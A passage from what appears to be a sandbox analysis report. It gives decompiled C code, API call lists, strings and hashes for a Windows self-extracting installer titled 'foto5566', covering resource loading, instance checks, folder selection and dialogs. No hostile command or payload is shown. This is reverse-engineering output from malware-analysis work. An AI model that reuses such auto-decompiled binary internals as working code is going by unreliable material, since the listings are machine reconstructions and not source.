						_t24 =  *0xce91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xce91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00CE658A(0xce91e4, 0x104, 0xce1140);
								_t27 = E00CE58C8(0xce91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xce91e4 - 0x5c;
									if( *0xce91e4 != 0x5c) {
										L30:
										_t30 = E00CE597D(0xce91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xce91e5 - 0x5c;
									if( *0xce91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00CE44B9(_t64, 0x54a, 0xce91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xce91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xce91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xce91e4 - 0x5c;
						if( *0xce91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xce9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xce9a3c, 0x3e8, 0xce8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00CE4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xce87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00CE44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00ce321b
0x00ce321e
0x00ce3221
0x00ce343c
0x00ce343e
0x00ce343f
0x00ce3445
0x00ce3447
0x00000000
0x00ce3447
0x00ce3229
0x00ce322a
0x00ce322f
0x00ce33ec
0x00ce33f7
0x00ce3410
0x00ce3416
0x00ce341d
0x00ce342d
0x00ce342d
0x00ce3438
0x00000000
0x00ce3438
0x00ce3237
0x00ce3243
0x00ce3243
0x00ce3246
0x00ce32ee
0x00ce32f4
0x00ce32f6
0x00ce33d4
0x00ce33d6
0x00ce33db
0x00ce33dc
0x00ce33de
0x00ce33df
0x00ce3370
0x00ce3372
0x00000000
0x00ce3372
0x00ce32fc
0x00ce3301
0x00ce3301
0x00ce3303
0x00ce3304
0x00ce3304
0x00ce330a
0x00ce330d
0x00000000
0x00000000
0x00ce3313
0x00ce3318
0x00ce331a
0x00ce3331
0x00ce3332
0x00ce333a
0x00ce333d
0x00ce337c
0x00ce3388
0x00ce338f
0x00ce3394
0x00ce3396
0x00ce33a4
0x00ce33ab
0x00ce33b6
0x00ce33be
0x00ce33c3
0x00ce33c5
0x00ce3435
0x00ce3437
0x00ce3437
0x00000000
0x00ce3437
0x00ce33c7
0x00ce33c9
0x00ce33cc
0x00000000
0x00ce33cc
0x00ce33ad
0x00ce33b4
0x00000000
0x00000000
0x00000000
0x00ce33b4
0x00ce3398
0x00ce3399
0x00ce339b
0x00ce339c
0x00ce339d
0x00000000
0x00ce339d
0x00ce334c
0x00ce3351
0x00ce3354
0x00000000
0x00000000
0x00ce335c
0x00ce3362
0x00ce3364
0x00000000
0x00000000
0x00ce3366
0x00ce3367
0x00ce3369
0x00ce336a
0x00ce336b
0x00000000
0x00ce336b
0x00ce331c
0x00ce3323
0x00000000
0x00000000
0x00ce3329
0x00ce332b
0x00000000
0x00000000
0x00000000
0x00ce332b
0x00ce324c
0x00ce324c
0x00ce324f
0x00ce32c8
0x00ce32ce
0x00000000
0x00ce32ce
0x00ce3251
0x00ce3256
0x00000000
0x00000000
0x00ce3271
0x00ce3277
0x00ce3279
0x00ce3298
0x00ce329d
0x00ce329f
0x00000000
0x00000000
0x00ce32b0
0x00ce32b6
0x00ce32b8
0x00000000
0x00000000
0x00ce32be
0x00ce3280
0x00ce3289
0x00ce328e
0x00000000
0x00ce328e
0x00ce327b
0x00000000
0x00ce327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00CE8598,00000200), ref: 00CE3271
GetDesktopWindow.USER32 ref: 00CE33E2
SetWindowTextA.USER32(?,foto5566), ref: 00CE33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00CE3410
GetDlgItem.USER32(?,00000836), ref: 00CE3426
EnableWindow.USER32(00000000), ref: 00CE342D
EndDialog.USER32(?,00000000), ref: 00CE343F

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE32E2, 00CE32E7, 00CE3331, 00CE3344, 00CE335B, 00CE336A
foto5566, xrefs: 00CE33F1

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$foto5566
API String ID: 2418873061-3446996212
Opcode ID: 63ecfb39cefd18203963f9d2268e4bd319b40c320a26e3a9b251286f93ba80f4
Instruction ID: 6c4210323d056aa5bfcd54cdcc63717312584beec5825561bb55deffb090f674
Opcode Fuzzy Hash: 63ecfb39cefd18203963f9d2268e4bd319b40c320a26e3a9b251286f93ba80f4
Instruction Fuzzy Hash: EB51F6303412C0BAEB215B375C8DF7F2E59DB86B54F504428F656AF1D1CAA4AF02A261

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CE2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xce8004; // 0xd1db73d
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xce9a3c = __ecx;
				memset(0xce9140, 0, 0x8fc);
				memset(0xce8a20, 0, 0x32c);
				memset(0xce88c0, 0, 0x104);
				 *0xce93ec = 1;
				_t20 = E00CE468F("TITLE", 0xce9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xce858c = _t27;
					SetEvent(_t27);
					_t64 = 0xce9a34;
					if(E00CE468F("EXTRACTOPT", 0xce9a34, 4) != 0) {
						if(( *0xce9a34 & 0x000000c0) == 0) {
							L12:
							 *0xce9120 =  *0xce9120 & _t65;
							if(E00CE5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xce8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xce8184 != 0) {
										__imp__#17();
									}
									if( *0xce8a24 == 0) {
										_t57 = _t65;
										if(E00CE36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xce9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xce9a34 & 0x00000100) == 0 || ( *0xce8a38 & 0x00000001) != 0 || E00CE18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00CE6517(_t57, 0x7d6, _t34, E00CE19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00CE2390(0xce8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00CE44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00CE468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xce8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xce9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00CE44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00CE44B9(0, 0x54b, "foto5566", 0, 0x10, 0);
										L11:
										CloseHandle( *0xce8588);
										 *0xce9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00CE44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xce9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00CE6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00ce2cb5
0x00ce2cbc
0x00ce2cc7
0x00ce2cc9
0x00ce2cd1
0x00ce2cd3
0x00ce2cd9
0x00ce2ce9
0x00ce2cf9
0x00ce2d0e
0x00ce2d15
0x00ce2d1c
0x00ce2ef3
0x00000000
0x00ce2d2d
0x00ce2d34
0x00ce2d3b
0x00ce2d40
0x00ce2d48
0x00ce2d59
0x00ce2d84
0x00ce2e1f
0x00ce2e1f
0x00ce2e2e
0x00ce2e41
0x00ce2e5a
0x00ce2e62
0x00ce2e6c
0x00ce2e6c
0x00ce2e75
0x00ce2e77
0x00ce2e77
0x00ce2e84
0x00ce2e8b
0x00ce2e94
0x00000000
0x00ce2e96
0x00ce2e96
0x00ce2e9e
0x00ce2ea2
0x00ce2eba
0x00000000
0x00ce2ece
0x00ce2ede
0x00ce2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce2eed
0x00ce2eef
0x00ce2eef
0x00ce2eef
0x00ce2eef
0x00ce2ea2
0x00ce2e86
0x00ce2e88
0x00ce2e88
0x00ce2e43
0x00ce2e48
0x00000000
0x00ce2e48
0x00ce2e30
0x00ce2e30
0x00ce2ef8
0x00ce2f01
0x00000000
0x00ce2f01
0x00ce2d8a
0x00ce2d8f
0x00ce2da1
0x00000000
0x00ce2da3
0x00ce2dae
0x00ce2db4
0x00ce2dbb
0x00000000
0x00ce2dca
0x00ce2dd3
0x00ce2df5
0x00ce2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce2dd5
0x00ce2dde
0x00ce2de3
0x00ce2e04
0x00ce2e0a
0x00ce2e10
0x00000000
0x00ce2e10
0x00ce2dd3
0x00ce2dbb
0x00ce2da1
0x00ce2d5b
0x00ce2d5b
0x00ce2d5d
0x00ce2d69
0x00ce2d6e
0x00ce2f06
0x00ce2f06
0x00ce2f06
0x00ce2d59
0x00ce2f18

APIs

memset.MSVCRT ref: 00CE2CD9
memset.MSVCRT ref: 00CE2CE9
memset.MSVCRT ref: 00CE2CF9

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00CE2DBD
CloseHandle.KERNEL32(foto5566,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE2E0A

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Strings

TITLE, xrefs: 00CE2D09
VERCHECK, xrefs: 00CE2E54
foto5566, xrefs: 00CE2D04, 00CE2DD9, 00CE2DF0
INSTANCECHECK, xrefs: 00CE2D95
EXTRACTOPT, xrefs: 00CE2D4D

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$foto5566
API String ID: 1002816675-4175695480
Opcode ID: 97d61c78b8ac1d3f89f781ee725ff3a03afd14a4348beebb5446903232666a58
Instruction ID: 0beb2576f3b8ad6bd43b4689db18fdb2a929621ba49bfacfd9d8ac735c02a0cb
Opcode Fuzzy Hash: 97d61c78b8ac1d3f89f781ee725ff3a03afd14a4348beebb5446903232666a58
Instruction Fuzzy Hash: 2151F7703403D1ABEB24AB739C8AB7F36ACDB45701F044039FA56DA2D1DBB88D45E621

Uniqueness

Uniqueness Score: -1.00%

Function 00CE34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CE34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xce91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xce8584 = _t35;
					E00CE43D0(_t35, GetDesktopWindow());
					__eflags =  *0xce8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "foto5566");
					_t17 = CreateThread(0, 0, E00CE4FE0, 0, 0, 0xce8798);
					 *0xce879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00CE44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xce858c);
					_t38 =  *0xce8584; // 0x0
					_t25 = E00CE44B9(_t38, 0x4b2, 0xce1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xce91d8 = 1;
						SetEvent( *0xce858c);
						_t39 =  *0xce879c; // 0x0
						E00CE3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xce858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xce879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x00ce34fb
0x00ce34fe
0x00ce3665
0x00ce3666
0x00ce3666
0x00ce3668
0x00ce366e
0x00ce366e
0x00ce3671
0x00ce3671
0x00ce3677
0x00000000
0x00ce3677
0x00ce3504
0x00ce3506
0x00ce3507
0x00ce350c
0x00ce365b
0x00ce365f
0x00000000
0x00000000
0x00000000
0x00ce3661
0x00ce3512
0x00ce3515
0x00ce35be
0x00ce35c1
0x00ce35d1
0x00ce35d8
0x00ce35de
0x00ce35f8
0x00ce3617
0x00ce3617
0x00ce3623
0x00ce3637
0x00ce363d
0x00ce3642
0x00ce3644
0x00000000
0x00ce3646
0x00ce3652
0x00ce3657
0x00ce3658
0x00000000
0x00ce3658
0x00ce3644
0x00ce351b
0x00ce351d
0x00ce354f
0x00ce3553
0x00000000
0x00000000
0x00ce355f
0x00ce3565
0x00ce357c
0x00ce3581
0x00ce3584
0x00ce359b
0x00ce35a1
0x00ce35a7
0x00ce35ad
0x00ce35b3
0x00ce35b8
0x00000000
0x00ce35b8
0x00ce3586
0x00ce3588
0x00000000
0x00000000
0x00ce3590
0x00000000
0x00ce3590
0x00ce3524
0x00ce3535
0x00ce3541
0x00000000
0x00ce3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00CE3535
EndDialog.USER32(?,?), ref: 00CE3541
ResetEvent.KERNEL32 ref: 00CE355F
SetEvent.KERNEL32(00CE1140,00000000,00000020,00000004), ref: 00CE3590
GetDesktopWindow.USER32 ref: 00CE35C7
GetDlgItem.USER32(?,0000083B), ref: 00CE35F1
SendMessageA.USER32(00000000), ref: 00CE35F8
GetDlgItem.USER32(?,0000083B), ref: 00CE3610
SendMessageA.USER32(00000000), ref: 00CE3617
SetWindowTextA.USER32(?,foto5566), ref: 00CE3623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00CE8798), ref: 00CE3637
EndDialog.USER32(?,00000000), ref: 00CE3671

Strings

foto5566, xrefs: 00CE361D

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: foto5566
API String ID: 2406144884-645582358
Opcode ID: e183649f849f6295edfde6e5c1ce58485589057e7f4e7d1a1f706a9305417e7a
Instruction ID: b59ddba204f909af2261299127cdcf254400866983e28ec7b8b6e66b376bfc99
Opcode Fuzzy Hash: e183649f849f6295edfde6e5c1ce58485589057e7f4e7d1a1f706a9305417e7a
Instruction Fuzzy Hash: 73318D712403C1BFDB201F37AC8DF2E3A69F785B41F544529F61AAE2A0CA75AA00DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CE4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00CE44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xce88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xce87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xce8598;
					_v36 = 1;
					_v32 = E00CE4200;
					_v28 = 0xce88c0;
					 *0xcea288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xcea288(_t32, 0xce88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xce88c0 != 0) {
							E00CE1680(0xce87a0, 0x104, 0xce88c0);
						}
						 *0xcea288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xce87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xce88c0);
					_t61 = 0xce88c0;
					_t4 =  &(_t61[1]); // 0xce88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xce88c0; // 0x19d1181
					_t44 = CharPrevA(0xce88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xce88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00ce4234
0x00ce423c
0x00ce4240
0x00ce43b2
0x00ce43b7
0x00ce43c0
0x00000000
0x00ce43c5
0x00ce424c
0x00ce4252
0x00ce4257
0x00ce43a4
0x00ce43a5
0x00ce43ab
0x00000000
0x00ce43ab
0x00ce4263
0x00ce4269
0x00ce426e
0x00000000
0x00000000
0x00ce427a
0x00ce4280
0x00ce4285
0x00000000
0x00000000
0x00ce428d
0x00ce4293
0x00ce42e6
0x00ce42e9
0x00ce42ef
0x00ce42f4
0x00ce42f7
0x00ce4300
0x00ce4307
0x00ce430e
0x00ce4315
0x00ce431c
0x00ce4322
0x00ce4326
0x00ce432d
0x00ce432d
0x00ce432f
0x00ce4334
0x00ce4343
0x00ce4349
0x00ce434d
0x00ce4354
0x00ce4354
0x00ce435d
0x00ce436e
0x00ce436e
0x00ce437d
0x00ce4383
0x00ce4387
0x00ce438e
0x00ce438e
0x00ce4387
0x00ce4391
0x00ce4399
0x00000000
0x00ce4295
0x00ce429f
0x00ce42a5
0x00ce42aa
0x00ce42aa
0x00ce42ad
0x00ce42ad
0x00ce42af
0x00ce42b0
0x00ce42b6
0x00ce42c2
0x00ce42c8
0x00ce42ce
0x00ce42e4
0x00ce42e4
0x00000000
0x00ce42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00CE4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00CE424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00CE4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00CE427A
GetTempPathA.KERNEL32(00000104,00CE88C0,?,00000001), ref: 00CE429F
CharPrevA.USER32(00CE88C0,019D1181,?,00000001), ref: 00CE42C2
CharPrevA.USER32(00CE88C0,00000000,?,00000001), ref: 00CE42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00CE4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00CE43A5

Strings

SHELL32.DLL, xrefs: 00CE422F
SHGetPathFromIDList, xrefs: 00CE4274
SHBrowseForFolder, xrefs: 00CE4246

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 2059122b32dc1eef7c656b050ee976abb38a30acfe51a6a0dc02cfe872a594ea
Instruction ID: 12d15eb8c4033bb42781397e844c22b86a44bb38b8277602e9aa6bc6f215aaef
Opcode Fuzzy Hash: 2059122b32dc1eef7c656b050ee976abb38a30acfe51a6a0dc02cfe872a594ea
Instruction Fuzzy Hash: AB412774A002C4AFD715AF72DCC8B6E7FB4EB45344F040169FA55AB2A1CB748D05C762

Uniqueness

Uniqueness Score: -1.00%

Function 00CE44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CE44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xce8004; // 0xd1db73d
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xce8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xce9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00CE1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
